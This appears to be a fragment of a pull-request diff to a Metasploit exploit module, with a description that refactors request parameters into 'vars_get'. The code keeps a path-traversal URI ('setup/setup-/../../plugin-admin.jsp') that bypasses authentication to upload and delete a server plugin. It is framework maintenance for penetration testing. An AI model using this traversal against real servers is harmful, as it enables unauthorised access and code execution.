-      'data'    => data,
-      'headers' =>
-        {
-          'Content-Type'   => 'multipart/form-data; boundary=' + boundary,
-          'Content-Length' => data.length,
-          'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
-        }
+      'uri'       => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp"),
+      'method'    => 'POST',
+      'data'      => data,
+      'headers'   => {
+        'Content-Type'   => 'multipart/form-data; boundary=' + boundary,
+        'Content-Length' => data.length,
+        'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
+      },
+      'vars_get'  => {
+        'uploadplugin' => ''
+      }
     })
 
 
@@ -199,11 +201,13 @@ class Metasploit3 < Msf::Exploit::Remote
     if datastore['REMOVE_PLUGIN']
       print_status("Deleting plugin #{plugin_name} from the server")
       res = send_request_cgi({
-        'uri'     => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase,
-        'headers' =>
-          {
-            'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
-          }
+        'uri'       => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp"),
+        'headers'   => {
+          'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
+        },
+        'vars_get'  => {
+          'deleteplugin' => plugin_name.downcase
+        }
       })
       if not res
         print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.")


### PR DESCRIPTION
This PR processes some msftidy warnings about `vars_get`. I hope the changes are not breaking the exploits because of double URL encoding. 
Example:

```
'vars_get'  => {
  'cmd' => Rex::Text.uri_encode(sploit)
}
```

Can someone do some example tests on this?
